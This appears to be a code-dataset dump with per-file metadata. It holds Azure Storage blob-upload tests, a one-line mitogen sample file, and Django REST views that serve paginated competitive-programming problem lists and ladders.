if self.is_live:
try:
self.bsc.create_container(self.container_name)
except:
pass
def _teardown(self, file_name):
if path.isfile(file_name):
try:
remove(file_name)
except:
pass
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
def _create_blob(self):
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(b'')
return blob
def assertBlobEqual(self, container_name, blob_name, expected_data):
blob = self.bsc.get_blob_client(container_name, blob_name)
actual_data = blob.download_blob()
self.assertEqual(b"".join(list(actual_data.chunks())), expected_data)
# --Test cases for block blobs --------------------------------------------
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_bytes_large(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'), urandom(LARGE_BLOCK_SIZE))
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_bytes_large_with_md5(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'),
urandom(LARGE_BLOCK_SIZE),
validate_content=True)
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_stream_large(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'),
stream,
length=LARGE_BLOCK_SIZE)
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_stream_large_with_md5(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'),
stream,
length=LARGE_BLOCK_SIZE,
validate_content=True)
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'large_blob_from_path.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2, overwrite=True)
block_list = blob.get_block_list()
# Assert
self.assertIsNot(len(block_list), 0)
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_with_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = "blob_from_path_with_md5.temp.dat"
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, validate_content=True, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_non_parallel(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(self.get_random_bytes(100))
FILE_PATH = "blob_from_path_non_parallel.temp.dat"
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_with_progress(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = "blob_from_path_with_progress.temp.dat"
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(response):
current = response.context['upload_stream_current']
total = response.context['data_stream_total']
if current is not None:
progress.append((current, total))
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assert_upload_progress(len(data), self.config.max_block_size, progress)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_with_properties(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'blob_from_path_with_properties.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
content_settings = ContentSettings(
content_type='image/png',
content_language='spanish')
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
properties = blob.get_blob_properties()
self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_stream_chunked_upload(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'blob_from_stream_chunked_upload.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_creat_lrgblob_frm_stream_w_progress_chnkd_upload(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'stream_w_progress_chnkd_upload.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(response):
current = response.context['upload_stream_current']
total = response.context['data_stream_total']
if current is not None:
progress.append((current, total))
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assert_upload_progress(len(data), self.config.max_block_size, progress)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_stream_chunked_upload_with_count(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'chunked_upload_with_count.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data) - 301
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, length=blob_size, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_creat_lrgblob_frm_strm_chnkd_uplod_w_count_n_props(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'plod_w_count_n_props.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
content_settings = ContentSettings(
content_type='image/png',
content_language='spanish')
blob_size = len(data) - 301
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(
stream, length=blob_size, content_settings=content_settings, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
properties = blob.get_blob_properties()
self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_creat_lrg_blob_frm_stream_chnked_upload_w_props(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'creat_lrg_blob.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
content_settings = ContentSettings(
content_type='image/png',
content_language='spanish')
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
properties = blob.get_blob_properties()
self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
self._teardown(FILE_PATH)
# ------------------------------------------------------------------------------
| 41.114634
| 139
| 0.661684
| 1,995
| 16,857
| 5.269173
| 0.110777
| 0.077245
| 0.046899
| 0.074581
| 0.835616
| 0.822869
| 0.816781
| 0.816781
| 0.816781
| 0.816781
| 0
| 0.007661
| 0.225663
| 16,857
| 410
| 140
| 41.114634
| 0.797671
| 0.095687
| 0
| 0.705882
| 0
| 0
| 0.050151
| 0.026392
| 0
| 0
| 0
| 0
| 0.128028
| 1
| 0.072664
| false
| 0.00692
| 0.038062
| 0.00346
| 0.121107
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18ef7f86cf11c7a37538f317297da5c2a7006aca
| 9
|
py
|
Python
|
tests/data/minimize_samples/mod_min.py
|
msaladna/mitogen
|
c6824b68181729cb16c090e72f4d35d6c4d95523
|
[
"BSD-3-Clause"
] | 1,526
|
2017-09-15T18:49:40.000Z
|
2021-01-17T16:04:12.000Z
|
tests/data/minimize_samples/mod_min.py
|
msaladna/mitogen
|
c6824b68181729cb16c090e72f4d35d6c4d95523
|
[
"BSD-3-Clause"
] | 682
|
2017-09-11T17:43:12.000Z
|
2021-01-17T05:26:26.000Z
|
tests/data/minimize_samples/mod_min.py
|
msaladna/mitogen
|
c6824b68181729cb16c090e72f4d35d6c4d95523
|
[
"BSD-3-Clause"
] | 111
|
2017-09-15T23:21:37.000Z
|
2021-01-01T14:45:35.000Z
|
pass
| 1.5
| 4
| 0.444444
| 1
| 9
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.555556
| 9
| 5
| 5
| 1.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7a07ae83af7f86eb956cc40bfcde4f5884cdbdd7
| 52,702
|
py
|
Python
|
codedigger/lists/views.py
|
prahasR/Backend
|
bde1b28a5c89ecc7205f244ad5644eae356a5517
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/views.py
|
prahasR/Backend
|
bde1b28a5c89ecc7205f244ad5644eae356a5517
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/views.py
|
prahasR/Backend
|
bde1b28a5c89ecc7205f244ad5644eae356a5517
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import generics, status, permissions, views, response, mixins
from .models import ListInfo, Solved, List, ListExtraInfo, LadderStarted
from problem.models import Problem
from user.models import User, Profile
from .serializers import (GetLadderSerializer, GetSerializer,
GetUserlistSerializer, EditUserlistSerializer,
CreateUserlistSerializer, ProblemSerializer,
UserlistAddSerializer, UpdateLadderSerializer,
UpdateListSerializer, AddProblemsAdminSerializer)
from django.db.models import Q
from .permissions import IsOwner
from .solved_update import codeforces, uva, atcoder, codechef, spoj, atcoder_scraper_check
from .cron import updater, cron_atcoder, cron_codechef, cron_codeforces, cron_spoj, cron_uva, codechef_list
from django.core.paginator import Paginator
from user.permissions import *
from user.exception import *
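# getqs is a manual pagination helper: it returns the slice of qs for the given 1-indexed page of page_size items.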
def getqs(qs, page_size, page):
qs = qs[page_size * (page - 1):page_size * page]
return qs
class TopicwiseGetListView(generics.ListAPIView):
serializer_class = GetSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class TopicWiseRetrieveView(views.APIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page = self.request.GET.get('page', None)
page_size = 6
description = curr_list.description
name = curr_list.name
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
problem_qs = curr_list.problem.all().order_by('rating', 'id')
total = curr_list.problem.all().count()
cnt = total // page_size
if total % page_size != 0:
cnt += 1
path = request.build_absolute_uri('/lists/topicwise/list/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
completed = True
if not page:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
page = 1
temp = {'F': True, 'A': True, 'U': True}
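# The temp flags let the Codeforces/AtCoder/UVa solved-status updaters run at most once per request; SPOJ and CodeChef are refreshed per problem.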
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
True,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
if not completed:
res['meta']['completed'] = False
return response.Response(res)
else:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
qs = getqs(problem_qs, page_size, page)
temp = {'F': True, 'A': True, 'U': True}
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
False,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
class TopicwiseGetLadderView(generics.ListAPIView):
serializer_class = GetLadderSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class TopicWiseLadderRetrieveView(generics.RetrieveAPIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page_size = 6
name = curr_list.name
description = curr_list.description
difficulty = None
video_link = None
contest_link = None
editorial = None
first_time = True
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
path = request.build_absolute_uri('/lists/topicwise/ladder/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
if user is not None:
if not LadderStarted.objects.filter(ladder_user=user,
ladder=curr_list).exists():
LadderStarted.objects.create(ladder_user=user,
ladder=curr_list)
problem_qs = curr_list.problem.all()
if user:
temp = ['F']
if Profile.objects.get(owner=user).spoj != None:
temp.append('S')
if Profile.objects.get(owner=user).uva_handle != None:
temp.append('U')
if Profile.objects.get(owner=user).atcoder != None:
temp.append('A')
if Profile.objects.get(owner=user).codechef != None:
temp.append('C')
problem_qs = problem_qs.filter(platform__in=temp)
cnt = int(problem_qs.count() / page_size)
if problem_qs.count() % page_size != 0:
cnt += 1
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
problem_qs = problem_qs.order_by('rating', 'id')
page = 1
curr_prob = None
curr_page = None
completed = False
if user:
completed = True
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder_scraper_check(user, ele)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
curr_prob = ele.prob_id
curr_page = page
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
if self.request.GET.get('page', None):
page = self.request.GET.get('page', None)
completed = False
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'curr_prob':
curr_prob,
'curr_unsolved_page':
curr_page,
'completed':
completed,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/ladder/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
curr_list.problem.all().count()
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
class LevelwiseGetListView(generics.ListAPIView):
serializer_class = GetSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class LevelwiseRetrieveView(views.APIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page = self.request.GET.get('page', None)
page_size = 6
description = curr_list.description
name = curr_list.name
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
problem_qs = curr_list.problem.all().order_by('rating', 'id')
total = curr_list.problem.all().count()
cnt = total // page_size
if total % page_size != 0:
cnt += 1
path = request.build_absolute_uri('/lists/levelwise/list/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
completed = True
if not page:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
page = 1
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
completed = False
break
if not completed:
break
page += 1
if completed:
page = 1
qs = getqs(problem_qs, page_size, page)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
True,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/levelwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
if not completed:
res['meta']['completed'] = False
return response.Response(res)
else:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
if page.isdigit():
page = int(page)
else:
return response.Response(
{
'status': 'FAILED',
'error': 'Page must be an integer.'
},
status=status.HTTP_400_BAD_REQUEST)
if page > cnt:
return response.Response(
{
'status': 'FAILED',
'error': 'Page Out of Bound'
},
status=status.HTTP_400_BAD_REQUEST)
if page == cnt:
Next = None
else:
Next = path + 'page=' + str(page + 1)
if page == 1:
Prev = None
else:
Prev = path + 'page=' + str(page - 1)
qs = getqs(problem_qs, page_size, page)
temp = {'F': True, 'A': True, 'U': True}
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
res = {
'status':
"OK",
'result':
ProblemSerializer(qs,
many=True,
context={
"slug": curr_list,
"user": user
}).data,
'link': {
'first': path + "page=1",
'last': path + "page=" + str(cnt),
'prev': Prev,
'next': Next,
},
'meta': {
'user':
user,
'completed':
False,
'name':
name,
'description':
description,
'difficulty':
difficulty,
'video_link':
video_link,
'contest_link':
contest_link,
'editorial':
editorial,
'current_page':
page,
'from': (page - 1) * page_size + 1,
'last_page':
cnt,
'path':
request.build_absolute_uri('/lists/topicwise/list/' +
str(slug)),
'per_page':
page_size,
'to':
page * page_size,
'total':
total
}
}
if user:
res['meta']['user'] = user.username
return response.Response(res)
class LevelwiseGetLadderView(generics.ListAPIView):
serializer_class = GetLadderSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class LevelwiseLadderRetrieveView(generics.RetrieveAPIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='2') | Q(type_list='3'))
& Q(isTopicWise=False) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page_size = 6
name = curr_list.name
description = curr_list.description
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
path = request.build_absolute_uri('/lists/levelwise/ladder/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
if user is not None:
if not LadderStarted.objects.filter(ladder_user=user,
ladder=curr_list).exists():
LadderStarted.objects.create(ladder_user=user,
ladder=curr_list)
problem_qs = curr_list.problem.all()
if user:
temp = ['F']
if Profile.objects.get(owner=user).spoj != None:
temp.append('S')
if Profile.objects.get(owner=user).uva_handle != None:
temp.append('U')
if Profile.objects.get(owner=user).atcoder != None:
temp.append('A')
if Profile.objects.get(owner=user).codechef != None:
temp.append('C')
problem_qs = problem_qs.filter(platform__in=temp)
cnt = int(problem_qs.count() / page_size)
if problem_qs.count() % page_size != 0:
cnt += 1
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
problem_qs = problem_qs.order_by('rating', 'id')
page = 1
curr_prob = None
curr_page = None
completed = False
if user:
completed = True
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
